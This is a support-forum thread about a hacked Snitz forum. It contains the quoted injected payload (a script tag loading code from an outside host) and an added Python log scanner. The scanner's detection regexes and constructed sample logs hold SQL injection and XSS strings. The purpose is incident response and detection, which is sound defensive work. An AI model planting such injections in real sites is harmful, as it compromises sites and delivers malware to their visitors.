My Forum was Hacked - Posted (979 Views)
Starting Member
bendecko
Posts: 5
Hi

http://www.thegamersguild.co.uk/forum/

</title><script src=http://google-stats49.info/ur.php></script> seems to be what they entered.

You can see this on the Title of General forum.
I was under the impression Snitz was not vulnerable to SQL injection?
What can I do to clean this up?
What can I do to prevent it happening?
Thanks

Ben
Posted
Snitz Forums Admin
ruirib
Posts: 26364
You cannot make any assumptions unless you are running our latest version, with the latest security fixes applied. The current version with all the fixes applied (I would almost risk saying the downloadable version has the security fixes applied, but I can't say it with complete certainty) has no known vulnerabilities. In the current day and age that's all we can guarantee.
I would say that if you don't have mods, just upgrade to the latest version and check if the most recent security fixes are applied. If you have mods and don't want to apply them again, I suggest that you apply all the security fixes that are applicable to your forum version (3.4.06).
You can also have a look at the server logs, to find out how they hacked the forum. Should be rather easy to do that, if you have access to the server logs.
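The log review suggested above, as an added example that is not part of the original post or of the Snitz code: it scans web server logs for query strings that carry the injected script host or common injection markers. It assumes IIS-style W3C extended logs with a `#Fields` header; the regex heuristics, the sample lines and the `page.asp` name are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Indicator from the thread: host of the injected <script> tag.
INJECTED_HOST = "google-stats49.info"
# Assumed heuristics for injection attempts in a query string; tune as needed.
INJECTION = re.compile(
    r"\b(?:declare\s+@|cast\s*\(|exec\s*\(|union\s+select)|<script", re.I)

# Constructed sample in W3C extended format (not taken from a real server).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2000-01-01 10:15:01 GET /forum/default.asp - 192.0.2.10 200
2000-01-01 10:15:07 GET /forum/topic.asp TOPIC_ID=42 192.0.2.10 200
2000-01-01 10:16:30 GET /forum/page.asp id=42;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0xCONSTRUCTED%20AS%20VARCHAR(4000));EXEC(@S); 198.51.100.7 500
2000-01-01 10:17:02 GET /forum/page.asp id=1&x=%3Cscript+src%3Dhttp://google-stats49.info/ur.php%3E 198.51.100.7 200
""".splitlines()


def parse_w3c(lines):
    """Yield one dict per request, using the #Fields header for column names."""
    fields = []
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            values = line.split()
            if fields and len(values) == len(fields):
                yield dict(zip(fields, values))


def suspicious_requests(lines):
    """Return (date, time, client IP, page, reasons) for flagged requests."""
    hits = []
    for rec in parse_w3c(lines):
        # Decode twice so double-encoded input (%253C) is also normalised.
        query = unquote_plus(unquote_plus(rec.get("cs-uri-query", "-")))
        reasons = []
        if INJECTED_HOST in query.lower():
            reasons.append("injected-host")
        if INJECTION.search(query):
            reasons.append("injection-pattern")
        if reasons:
            hits.append((rec.get("date"), rec.get("time"), rec.get("c-ip"),
                         rec.get("cs-uri-stem"), reasons))
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(*hit)
```

IIS does not record POST bodies in these logs, so an injection submitted through a form field will not show up in `cs-uri-query`; an empty result here does not rule that path out.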
Posted
Starting Member
bendecko
Posts: 5
OK I upgraded to the latest version.
What about security fixes for the latest version?
E.g. http://forum.snitz.com/forum/topic.asp?TOPIC_ID=69117

Have these been added to the download or need I do these manually?
Posted
Snitz Forums Admin
ruirib
Posts: 26364
Unfortunately I cannot be sure they are included. If someone else can shed any light on that, please do.
It is, however, easy to check if they are in the code. Just have a look at how the code should look after the fixes (each fix provides information about that) and confirm that the fixes are in the downloaded code. If they are not, then add them.
I will perform this check later, as I can't do it where I am now.
 